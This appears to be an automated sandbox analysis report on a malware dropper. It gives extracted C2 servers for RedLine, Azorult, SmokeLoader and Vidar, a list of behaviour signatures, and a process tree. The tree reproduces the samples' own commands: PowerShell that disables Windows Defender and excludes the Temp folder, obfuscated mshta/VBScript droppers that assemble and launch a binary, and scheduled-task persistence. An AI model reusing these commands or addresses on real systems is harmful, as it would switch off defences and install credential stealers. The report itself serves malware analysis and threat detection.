Analysis
-
max time kernel
1959s -
max time network
2192s -
submitted
01-01-1970 00:00
General
-
Target
Password_is_5432764372___BitlyWindows10t.exe
-
Size
15.2MB
-
MD5
da5aeb58d5eb8c855ae1edd303ae3e5c
-
SHA1
737d43206e98464433e27ee5981040d2904bcd42
-
SHA256
4a72c2884235efd7f6428699d2f7750590eb34154ab2bd05a1aeb92a4a0e2352
-
SHA512
b0a000ad6cd340aa2b8af9195276f772e5be16c574a3344e23964856c29e0fda734c703d461f9f3c985dd248538c42e45181efdabca10bcea649b79c1c685ac6
Score
10/10
Malware Config
Extracted
Family
redline
Botnet
media26
C2
91.121.67.60:23325
Extracted
Family
redline
Botnet
chris
C2
194.104.136.5:46013
Extracted
Family
azorult
C2
http://kvaka.li/1210776429.php
Extracted
Family
smokeloader
Version
2020
C2
http://brandyjaggers.com/upload/
http://andbal.com/upload/
http://alotofquotes.com/upload/
http://szpnc.cn/upload/
http://uggeboots.com/upload/
http://100klv.com/upload/
http://rapmusic.at/upload/
rc4.i32
rc4.i32
Extracted
Family
vidar
Version
41.6
Botnet
933
C2
https://mas.to/@lilocc
Attributes
-
profile_id
933
Signatures
-
Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Modifies Windows Defender Real-time Protection settings 3 TTPs
-
Pony,Fareit
Pony is a Remote Access Trojan application that steals information.
-
Process spawned unexpected child process 3 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 4 IoCs
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
-
Socelars Payload 2 IoCs
-
Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs
-
Vidar
Vidar is an infostealer based on Arkei stealer.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 2 IoCs
-
ASPack v2.12-2.42 7 IoCs
Detects executables packed with ASPack v2.12-2.42
-
Blocklisted process makes network request 64 IoCs
-
Downloads MZ/PE file
-
Drops file in Drivers directory 5 IoCs
-
Executes dropped EXE 64 IoCs
-
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Checks computer location settings 2 TTPs 7 IoCs
Looks up country code configured in the registry, likely geofence.
-
Loads dropped DLL 64 IoCs
-
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
-
Accesses Microsoft Outlook profiles 1 TTPs 1 IoCs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 10 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks whether UAC is enabled 1 TTPs 5 IoCs
-
Enumerates connected drives 3 TTPs 48 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 19 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Drops file in System32 directory 31 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
-
Suspicious use of SetThreadContext 12 IoCs
-
autoit_exe 2 IoCs
AutoIT scripts compiled to PE executables.
-
Drops file in Program Files directory 64 IoCs
-
Drops file in Windows directory 29 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 14 IoCs
-
Checks SCSI registry key(s) 3 TTPs 64 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Kills process with taskkill 7 IoCs
-
Modifies Internet Explorer settings 1 TTPs 2 IoCs
-
Modifies data under HKEY_USERS 60 IoCs
-
Modifies registry class 64 IoCs
-
Modifies system certificate store 2 TTPs 15 IoCs
-
Runs ping.exe 1 TTPs 2 IoCs
-
Script User-Agent 3 IoCs
Uses user-agent string associated with script host/environment.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
-
Suspicious behavior: MapViewOfSection 11 IoCs
-
Suspicious behavior: SetClipboardViewer 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 64 IoCs
-
Suspicious use of SendNotifyMessage 64 IoCs
-
Suspicious use of SetWindowsHookEx 64 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Views/modifies file attributes 1 TTPs 1 IoCs
-
outlook_win_path 1 IoCs
Processes
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Schedule1⤵
- Drops file in System32 directory
-
C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exeC:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe2⤵
-
C:\Users\Admin\AppData\Roaming\evbuveiC:\Users\Admin\AppData\Roaming\evbuvei2⤵
-
C:\Users\Admin\AppData\Roaming\tsbuveiC:\Users\Admin\AppData\Roaming\tsbuvei2⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Themes1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\Password_is_5432764372___BitlyWindows10t.exe"C:\Users\Admin\AppData\Local\Temp\Password_is_5432764372___BitlyWindows10t.exe"2⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Desktop\CrowdInspect64.exe"C:\Users\Admin\Desktop\CrowdInspect64.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\Новый текстовый документ.txt2⤵
-
C:\Users\Admin\Desktop\Software-update-patc_649073113.exe"C:\Users\Admin\Desktop\Software-update-patc_649073113.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\is-MCLNU.tmp\Software-update-patc_649073113.tmp"C:\Users\Admin\AppData\Local\Temp\is-MCLNU.tmp\Software-update-patc_649073113.tmp" /SL5="$3022C,3427571,240640,C:\Users\Admin\Desktop\Software-update-patc_649073113.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Dignissimos\dolor\Dolore.exe"C:\Program Files (x86)\Dignissimos/\dolor\Dolore.exe" 8e44798543c092df913aeba5431fb5a54⤵
- Executes dropped EXE
- Modifies registry class
-
C:\Users\Admin\AppData\Local\Temp\mOYrIBHn\2Vt7PNmo61KljYvoSu3.exeC:\Users\Admin\AppData\Local\Temp\mOYrIBHn\2Vt7PNmo61KljYvoSu3.exe /usthree SUB=8e44798543c092df913aeba5431fb5a55⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\mOYrIBHn\2Vt7PNmo61KljYvoSu3.exeC:\Users\Admin\AppData\Local\Temp\mOYrIBHn\2Vt7PNmo61KljYvoSu3.exe /usthree SUB=8e44798543c092df913aeba5431fb5a56⤵
-
C:\Users\Admin\AppData\Local\Temp\1M03fqOX\srlT0HOPwYSugJmNsy5n.exeC:\Users\Admin\AppData\Local\Temp\1M03fqOX\srlT0HOPwYSugJmNsy5n.exe /quiet SILENT=1 AF=606x8e44798543c092df913aeba5431fb5a55⤵
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=606x8e44798543c092df913aeba5431fb5a5 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\1M03fqOX\srlT0HOPwYSugJmNsy5n.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\1M03fqOX\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1635139200 /quiet SILENT=1 AF=606x8e44798543c092df913aeba5431fb5a5 " AF="606x8e44798543c092df913aeba5431fb5a5" AI_EXTEND_GLASS="26"6⤵
-
C:\Users\Admin\AppData\Local\Temp\NEzcHQw3\PIZeOjH2FDgNjSibAZ.exeC:\Users\Admin\AppData\Local\Temp\NEzcHQw3\PIZeOjH2FDgNjSibAZ.exe /VERYSILENT5⤵
-
C:\Users\Admin\AppData\Local\Temp\Skype.exeC:\Users\Admin\AppData\Local\Temp\Skype.exe6⤵
-
C:\Users\Admin\AppData\Local\Temp\Qxvmz8I8\vpn.exeC:\Users\Admin\AppData\Local\Temp\Qxvmz8I8\vpn.exe /silent /subid=510x8e44798543c092df913aeba5431fb5a55⤵
-
C:\Users\Admin\AppData\Local\Temp\is-4NJCM.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-4NJCM.tmp\vpn.tmp" /SL5="$5034A,15170975,270336,C:\Users\Admin\AppData\Local\Temp\Qxvmz8I8\vpn.exe" /silent /subid=510x8e44798543c092df913aeba5431fb5a56⤵
- Loads dropped DLL
- Drops file in Program Files directory
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "7⤵
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe remove tap09018⤵
- Checks SCSI registry key(s)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "7⤵
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe install OemVista.inf tap09018⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies system certificate store
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall7⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Desktop\setup_x86_x64_install.exe"C:\Users\Admin\Desktop\setup_x86_x64_install.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS03D09C37\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS03D09C37\setup_install.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable6⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"6⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed09f257bb7877d00b2.exe5⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS03D09C37\Wed09f257bb7877d00b2.exeWed09f257bb7877d00b2.exe6⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed09d8d6edfaff2ac.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS03D09C37\Wed09d8d6edfaff2ac.exeWed09d8d6edfaff2ac.exe6⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\7tSafS6VO7T7Bj0IzX23mNZA.exe"C:\Users\Admin\Pictures\Adobe Films\7tSafS6VO7T7Bj0IzX23mNZA.exe"7⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Adobe Films\gmrODb2EdKO90W7fYxJQIuWB.exe"C:\Users\Admin\Pictures\Adobe Films\gmrODb2EdKO90W7fYxJQIuWB.exe"7⤵
-
C:\Users\Admin\Pictures\Adobe Films\hAsi4SkWff9wB27krZcQwiFM.exe"C:\Users\Admin\Pictures\Adobe Films\hAsi4SkWff9wB27krZcQwiFM.exe"7⤵
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Adobe Films\hAsi4SkWff9wB27krZcQwiFM.exe"C:\Users\Admin\Pictures\Adobe Films\hAsi4SkWff9wB27krZcQwiFM.exe"8⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\Pictures\Adobe Films\STeSujNohlIoBLP8ZfdF7v58.exe"C:\Users\Admin\Pictures\Adobe Films\STeSujNohlIoBLP8ZfdF7v58.exe"7⤵
-
C:\Users\Admin\Pictures\Adobe Films\Be9XFdtjiwZyLI9WjDsmienk.exe"C:\Users\Admin\Pictures\Adobe Films\Be9XFdtjiwZyLI9WjDsmienk.exe"7⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Pictures\Adobe Films\fbryn2v5wMjnvWzSDNekX3yf.exe"C:\Users\Admin\Pictures\Adobe Films\fbryn2v5wMjnvWzSDNekX3yf.exe"7⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\lb7f2M9u88acwcmne7zFtnir.exe"C:\Users\Admin\Documents\lb7f2M9u88acwcmne7zFtnir.exe"8⤵
- Checks computer location settings
-
C:\Users\Admin\Pictures\Adobe Films\CNlKHNCnC0M4nYZIJjDNlj0S.exe"C:\Users\Admin\Pictures\Adobe Films\CNlKHNCnC0M4nYZIJjDNlj0S.exe"9⤵
-
C:\Users\Admin\Pictures\Adobe Films\LkhK2wKQ9hg8uBSGmALKcKt8.exe"C:\Users\Admin\Pictures\Adobe Films\LkhK2wKQ9hg8uBSGmALKcKt8.exe"9⤵
-
C:\Users\Admin\Pictures\Adobe Films\hAlU__saBPw5tUQn8Z2qeLrX.exe"C:\Users\Admin\Pictures\Adobe Films\hAlU__saBPw5tUQn8Z2qeLrX.exe"9⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe10⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe11⤵
- Kills process with taskkill
-
C:\Users\Admin\Pictures\Adobe Films\94LMopdOix0uHJNtm2TBV1kM.exe"C:\Users\Admin\Pictures\Adobe Films\94LMopdOix0uHJNtm2TBV1kM.exe"9⤵
-
C:\Users\Admin\Pictures\Adobe Films\KnMdtQYEPU7PBAbsTQJpULu4.exe"C:\Users\Admin\Pictures\Adobe Films\KnMdtQYEPU7PBAbsTQJpULu4.exe"9⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\KnMdtQYEPU7PBAbsTQJpULu4.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If """" == """" for %M in ( ""C:\Users\Admin\Pictures\Adobe Films\KnMdtQYEPU7PBAbsTQJpULu4.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )10⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\KnMdtQYEPU7PBAbsTQJpULu4.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "" == "" for %M in ( "C:\Users\Admin\Pictures\Adobe Films\KnMdtQYEPU7PBAbsTQJpULu4.exe" ) do taskkill -f -iM "%~NxM"11⤵
-
C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi12⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )13⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "/PLQtzfgO0m8dRv4iYALOqi " == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"14⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpt: CLosE ( cReAteobjEcT ( "wscRiPt.SheLl" ). RUn ( "C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE ) )13⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC14⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHo "15⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"15⤵
-
C:\Windows\SysWOW64\msiexec.exemsiexec -Y ..\lXQ2g.WC15⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "KnMdtQYEPU7PBAbsTQJpULu4.exe"12⤵
- Kills process with taskkill
-
C:\Users\Admin\Pictures\Adobe Films\3CsPL6IiZKIic_AMo2K_El4C.exe"C:\Users\Admin\Pictures\Adobe Films\3CsPL6IiZKIic_AMo2K_El4C.exe"9⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Adobe Films\WW4sA1wrJ90B5Ype_fT7KQHo.exe"C:\Users\Admin\Pictures\Adobe Films\WW4sA1wrJ90B5Ype_fT7KQHo.exe"9⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-8CUE7.tmp\WW4sA1wrJ90B5Ype_fT7KQHo.tmp"C:\Users\Admin\AppData\Local\Temp\is-8CUE7.tmp\WW4sA1wrJ90B5Ype_fT7KQHo.tmp" /SL5="$20516,506127,422400,C:\Users\Admin\Pictures\Adobe Films\WW4sA1wrJ90B5Ype_fT7KQHo.exe"10⤵
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-L1R1R.tmp\DYbALA.exe"C:\Users\Admin\AppData\Local\Temp\is-L1R1R.tmp\DYbALA.exe" /S /UID=270911⤵
- Drops file in Drivers directory
-
C:\Users\Admin\AppData\Local\Temp\58-45ca2-251-05891-51c9d1c743fb7\ZHefyshowyvi.exe"C:\Users\Admin\AppData\Local\Temp\58-45ca2-251-05891-51c9d1c743fb7\ZHefyshowyvi.exe"12⤵
- Accesses Microsoft Outlook accounts
- Accesses Microsoft Outlook profiles
- outlook_win_path
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\f2hfbktv.tqm\setting.exe SID=778 CID=778 SILENT=1 /quiet & exit13⤵
-
C:\Users\Admin\AppData\Local\Temp\f2hfbktv.tqm\setting.exeC:\Users\Admin\AppData\Local\Temp\f2hfbktv.tqm\setting.exe SID=778 CID=778 SILENT=1 /quiet14⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kd41z0u5.ym3\GcleanerEU.exe /eufive & exit13⤵
-
C:\Users\Admin\AppData\Local\Temp\kd41z0u5.ym3\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\kd41z0u5.ym3\GcleanerEU.exe /eufive14⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fq24hdlt.qnp\installer.exe /qn CAMPAIGN="654" & exit13⤵
-
C:\Users\Admin\AppData\Local\Temp\fq24hdlt.qnp\installer.exeC:\Users\Admin\AppData\Local\Temp\fq24hdlt.qnp\installer.exe /qn CAMPAIGN="654"14⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0lc2nytm.qkc\any.exe & exit13⤵
-
C:\Users\Admin\AppData\Local\Temp\0lc2nytm.qkc\any.exeC:\Users\Admin\AppData\Local\Temp\0lc2nytm.qkc\any.exe14⤵
-
C:\Users\Admin\AppData\Local\Temp\0lc2nytm.qkc\any.exe"C:\Users\Admin\AppData\Local\Temp\0lc2nytm.qkc\any.exe" -u15⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fodk2jfv.0sk\customer51.exe & exit13⤵
-
C:\Users\Admin\AppData\Local\Temp\fodk2jfv.0sk\customer51.exeC:\Users\Admin\AppData\Local\Temp\fodk2jfv.0sk\customer51.exe14⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5p0jhzuz.lax\gcleaner.exe /mixfive & exit13⤵
-
C:\Users\Admin\AppData\Local\Temp\5p0jhzuz.lax\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\5p0jhzuz.lax\gcleaner.exe /mixfive14⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\iqy3v4ou.gat\FastPC.exe /verysilent & exit13⤵
- Drops file in Drivers directory
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
-
C:\Users\Admin\AppData\Local\Temp\iqy3v4ou.gat\FastPC.exeC:\Users\Admin\AppData\Local\Temp\iqy3v4ou.gat\FastPC.exe /verysilent14⤵
-
C:\Users\Admin\AppData\Local\Temp\is-4UNMB.tmp\FastPC.tmp"C:\Users\Admin\AppData\Local\Temp\is-4UNMB.tmp\FastPC.tmp" /SL5="$10876,138429,56832,C:\Users\Admin\AppData\Local\Temp\iqy3v4ou.gat\FastPC.exe" /verysilent15⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ubute2ex.uue\autosubplayer.exe /S & exit13⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vfbvy5yo.h0d\installer.exe /qn CAMPAIGN=654 & exit13⤵
-
C:\Users\Admin\AppData\Local\Temp\vfbvy5yo.h0d\installer.exeC:\Users\Admin\AppData\Local\Temp\vfbvy5yo.h0d\installer.exe /qn CAMPAIGN=65414⤵
-
C:\Users\Admin\Pictures\Adobe Films\8rknjJZgHCZpB3_9rRRXaCTP.exe"C:\Users\Admin\Pictures\Adobe Films\8rknjJZgHCZpB3_9rRRXaCTP.exe"9⤵
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=110⤵
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--iUSIg"11⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x238,0x23c,0x240,0x214,0x244,0x7ff836d0dec0,0x7ff836d0ded0,0x7ff836d0dee012⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x134,0x138,0x13c,0x110,0x140,0x7ff692129e70,0x7ff692129e80,0x7ff692129e9013⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1656,10779345995291334930,18053435723609525723,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9292_1802036074" --mojo-platform-channel-handle=1760 /prefetch:812⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1656,10779345995291334930,18053435723609525723,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9292_1802036074" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1680 /prefetch:212⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST8⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST8⤵
- Creates scheduled task(s)
-
